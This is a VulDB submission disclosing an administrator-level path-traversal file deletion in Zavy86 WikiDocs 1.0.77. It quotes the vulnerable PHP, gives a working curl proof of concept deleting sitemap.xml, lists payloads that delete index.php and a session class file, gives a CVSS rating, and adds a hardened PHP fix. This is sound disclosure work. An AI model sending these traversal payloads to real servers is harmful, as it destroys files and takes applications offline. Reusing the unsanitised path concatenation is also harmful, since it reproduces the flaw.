Submit #609096: Zavy86 WikiDocs 1.0.77 Administrator Arbitrary File Deletion via Path Traversal

Title: Zavy86 WikiDocs 1.0.77 Administrator Arbitrary File Deletion via Path Traversal
Description:

The image_delete_ajax() endpoint in submit.php concatenates the user-supplied image filename onto its document directory without sanitization or canonicalization. An authenticated administrator can therefore delete any file on disk that the web server user can write, using a simple path-traversal payload.

Affected Component

    File: submit.php?act=image_delete_ajax
    Function: image_delete_ajax()
    Authentication: Requires session authentication level 2 (administrator)

Technical Details

The vulnerable code (as shipped; the filename is appended to the directory as-is):

    $document = $_POST['document'];
    $image_filename = $_POST['image_name'];
    ...
    $DOC = new Document($document);
    if(!is_dir($DOC->DIR)){ mkdir($DOC->DIR,0755,true); }
    $filename = $DOC->DIR . $image_filename;
    if (file_exists($filename)) {
        $image_deleted = unlink($filename);
    }

An admin can supply image_name=../../sensitive.php (or any other file) and have it deleted.

Proof of Concept (PoC):

The target file exists before the request:

    ┌──(root㉿kali)-[/home/kali]
    └─# curl http://127.0.0.1/sitemap.xml
    <?xml version="1.0" encoding="UTF-8"?>
    <urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
      <url>
        <loc>http://127.0.0.1/</loc>
        <lastmod>1970-01-01T00:00:00+00:00</lastmod>
      </url>
      <url>
        <loc>http://127.0.0.1/opt</loc>
        <lastmod>1970-01-01T00:00:00+00:00</lastmod>
      </url>
    </urlset>

The deletion request, sent with an administrator session cookie:

    ┌──(root㉿kali)-[/home/kali]
    └─# curl --path-as-is -i -s -k -X $'POST' \
        -H $'Host: 127.0.0.1' -H $'Content-Length: 38' -H $'Cache-Control: max-age=0' \
        -H $'sec-ch-ua: \"Chromium\";v=\"133\", \"Not(A:Brand\";v=\"99\"' -H $'sec-ch-ua-mobile: ?0' -H $'sec-ch-ua-platform: \"Linux\"' \
        -H $'Accept-Language: en-US,en;q=0.9' -H $'Origin: http://127.0.0.1' \
        -H $'Content-Type: application/x-www-form-urlencoded' -H $'Upgrade-Insecure-Requests: 1' \
        -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36' \
        -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' \
        -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-User: ?1' -H $'Sec-Fetch-Dest: document' \
        -H $'Referer: http://127.0.0.1/apidocs/com/sap/engine/deploy/manager/scripts/initializations.js?auth' \
        -H $'Accept-Encoding: gzip, deflate, br' -H $'Connection: keep-alive' \
        -b $'PHPSESSID=e3oi7be7l9pig7s3no19brasmp' \
        --data-binary $'document=&image_name=../../sitemap.xml' \
        $'http://127.0.0.1/submit.php?act=image_delete_ajax'

    HTTP/1.1 200 OK
    Date: Fri, 04 Jul 2025 08:15:44 GMT
    Server: Apache/2.4.62 (Unix)
    X-Powered-By: PHP/8.3.15
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Content-Length: 120
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8

    {"error":null,"code":"image_deleted","file":"\/var\/www\/localhost\/htdocs\/datasets\/documents\/\/..\/..\/sitemap.xml"}

The file is gone afterwards:

    ┌──(root㉿kali)-[/home/kali]
    └─# curl http://127.0.0.1/sitemap.xml
    <!DOCTYPE html>
    <html lang="en">
    <head>
    ... 404 page ...

Delete application code (DoS):

    document=&image_name=../../index.php
    document=&image_name=../../classes/Session.class.php

CVSS v3.1 Assessment

    Attack Vector (AV): Network
    Attack Complexity (AC): Low
    Privileges Required (PR): High (administrator session)
    User Interaction (UI): None
    Scope (S): Unchanged
    Confidentiality (C): None
    Integrity (I): Low/High (arbitrary file deletion)
    Availability (A): High (application DoS)

If "Integrity Low" is assumed (i.e. only non-critical files), the score would be 5.5; however, the ability to delete application source files could justify I:H.

Application Setup: docker run -d -p 80:80 zavy86/wikidocs

References: https://drive.google.com/drive/u/0/folders/100yv5_KxOHHqTvmMeXSquBuxafwj6sfh

Credits: Discovered by Matan Sandori
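The root cause above is the unchecked `$DOC->DIR . $image_filename` concatenation. The following is an added example of how that lookup can be hardened; it is not WikiDocs project code and not the vendor's fix. It assumes that `$DOC->DIR` is the per-document image directory and that legitimate image names are plain file names without path separators. The function name `safe_image_path` and the temporary-directory layout used for the self-check are constructed for this example.

```php
<?php
// Added example (not WikiDocs project code, not the vendor's patch): a hardened
// replacement for the `$DOC->DIR . $image_filename` concatenation in
// image_delete_ajax(). Assumes $DOC->DIR is the per-document image directory
// and that legitimate image names are plain file names.

function safe_image_path(string $dir, string $image_name): ?string
{
    // 1. Accept only a plain file name: no path separators (basename() would
    //    change it), not "." or "..", and a conservative character set that
    //    also excludes NUL bytes. "../../sitemap.xml" fails here already.
    if ($image_name === '' || $image_name === '.' || $image_name === '..'
        || $image_name !== basename($image_name)
        || !preg_match('/^[A-Za-z0-9._-]+$/', $image_name)) {
        return null;
    }

    // 2. Canonicalize both the base directory and the candidate. realpath()
    //    resolves "..", doubled slashes and symlinks, and returns false when
    //    the path does not exist, so a missing target is rejected as well.
    $base = realpath(rtrim($dir, '/\\'));
    $candidate = realpath($dir . DIRECTORY_SEPARATOR . $image_name);
    if ($base === false || $candidate === false) {
        return null;
    }

    // 3. Require the resolved path to sit strictly inside the base directory.
    //    The prefix includes the separator so "/docs-old/x" is not accepted
    //    as a child of "/docs". Also insist on a regular file, not a directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0 || !is_file($candidate)) {
        return null;
    }
    return $candidate;
}

// How the handler would use it (hypothetical, mirroring the page's snippet):
//   $filename = safe_image_path($DOC->DIR, $_POST['image_name'] ?? '');
//   if ($filename === null) { echo json_encode(['error' => 'invalid image name']); exit; }
//   $image_deleted = unlink($filename);

// Self-contained check against a constructed temporary layout:
// <tmp>/documents/logo.png is a legitimate image, <tmp>/sitemap.xml sits
// one level above the image directory.
$tmp = sys_get_temp_dir() . '/wikidocs_demo_' . bin2hex(random_bytes(4));
mkdir($tmp . '/documents', 0755, true);
file_put_contents($tmp . '/documents/logo.png', 'constructed sample');
file_put_contents($tmp . '/sitemap.xml', 'constructed sample');

var_dump(safe_image_path($tmp . '/documents/', 'logo.png'));        // legitimate name
var_dump(safe_image_path($tmp . '/documents/', '../sitemap.xml'));  // traversal attempt
var_dump(safe_image_path($tmp . '/documents/', 'missing.png'));     // nonexistent file

// Clean up the constructed layout.
unlink($tmp . '/documents/logo.png');
unlink($tmp . '/sitemap.xml');
rmdir($tmp . '/documents');
rmdir($tmp);
```

The name check in step 1 is what stops the payload from the PoC; steps 2 and 3 are defence in depth against symlinks inside the image directory and against any future code path that builds the name differently. Note that `realpath()` only works for files that exist, which is acceptable here because a delete of a nonexistent file should fail anyway.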
User: MatanS (UID 86894)
Submitted: 04.07.2025 10:38 (12 months ago)
Moderated: 13.07.2025 09:28 (9 days later)
Status: Accepted
VulDB Entry: 316273 [Zavy86 WikiDocs up to 1.0.77 submit.php image_drop_upload_ajax/image_delete_ajax Directory Traversal]
Points: 17
